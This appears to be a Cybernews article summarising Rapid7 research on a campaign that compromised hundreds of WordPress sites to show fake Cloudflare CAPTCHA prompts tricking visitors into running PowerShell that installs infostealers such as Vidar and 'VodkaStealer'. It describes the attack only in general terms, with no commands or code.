Cybercriminals have compromised hundreds of websites – including regional news outlets and the website of a US Senate candidate – in a global malware operation, new research has uncovered.

Instead of building malicious website sites from scratch, attackers are now hijacking trusted sites built on WordPress and turning them into malware delivery platforms, according to researchers at Rapid 7.

The security firm says that the campaign has already affected more than 250 compromised websites across 12 countries, including the UK, US, Germany, Australia, Canada Brazil India Slovakia and Switzerland.

In its report, Rapid 7 did not specify what initial vulnerabilities were used to break into the WordPress sites. While common ways in include social engineering, plug-in flaws and hackers targeting outdated websites, the author of the report, Milan Špinka, told Cybernews that at least some of the affected websites run on the latest WordPress version, and there is no single plugin or WordPress theme shared by all of the sites.

"The most likely scenario we are considering is that the attackers are not exploiting a WordPress-related vulnerability at all, but rather they are using valid credentials to hijack website administrator accounts by simply logging into publicly exposed admin panels."

Milan Špinka, security researcher, Rapid 7.

Once in, the firm reports that visitors to a compromised site are presented with what appears to be a Cloudflare verification CAPTCHA.

Instead of asking them to prove they are human, this fake ‘ClickFix’ issues a prompt that instructs them to copy and run a command on their computer which tricks users into executing a malicious PowerShell command that begins the infection process.

Once executed, the command downloads additional scripts from attacker-controlled servers.

In a detailed blog, Špinka, outlines how these scripts use Windows APIs including ‘VirtualAlloc’ and ‘CreateThread’ to load malicious code directly into memory. By running in memory instead of writing files to disk, the malware can bypass some security detection tools.

The attack ultimately installs infostealing malware including an updated version of Vidar stealer, a NET-based malware the security company names “Impure stealer”, and a newly-observed infostealer dubbed “VodkaStealer”” which Rapid 7 speculates may or may not have been developed via vibe coding.

Once installed, these infostealers search infected systems for sensitive information such as browser-stored credentials, authentication cookies, and cryptocurrency wallet information.

Rapid7 has chosen not to identify any of the affected companies – which include regional media outlets, local businesses and "in one case even a United States Senate candidate's official webpage."

The company adds that it has notified the US authorities of the latter incident.

Evidence suggests that the campaign has been active since December, although parts of the attack infrastructure date back to mid 2025, indicating that the campaign may have been carefully prepared before being deployed at scale.

---

Unlock more exclusive Cybernews content on YouTube.